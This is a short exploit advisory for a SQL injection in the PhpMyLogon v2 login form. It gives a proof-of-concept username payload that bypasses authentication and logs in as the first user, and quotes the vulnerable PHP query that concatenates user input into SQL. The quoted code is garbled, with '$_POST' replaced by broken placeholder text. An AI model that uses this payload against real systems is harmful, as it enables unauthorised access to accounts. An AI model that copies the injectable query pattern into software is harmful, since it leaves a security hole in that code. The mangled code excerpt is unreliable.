|
=========================================
PhpMyLogon v2 SQL Injection Vulnerability
=========================================
# Exploit Title: PhpMyLogon SQL Injection
# Date: March 14, 2010
# Author: Blake
# Software Link: http://sourceforge.net/projects/phpmylogon/files/PhpMyLogon/PhpMyLogon%202/phpmylogon2.zip/download
# Version: 2
# Tested on: Windows XP SP3
Proof of Concept:
Enter the following for the username to login as the first user:
blake' or '1'='1' #
and anything for the password.
Vulnerable Code:
if(isset(___FCKpd___0
POST['submit'])) {
if(___FCKpd___0
POST['username'] != "" AND ___FCKpd___0
POST['password'] != "") {
// Check submitted data with data in database
$sql = "SELECT id,username,password,cookie_pass,actcode,rank FROM `".$settings['db_table']."` WHERE username = '".___FCKpd___0
POST['username']."' LIMIT 1";
$query = mysql_query($sql);
|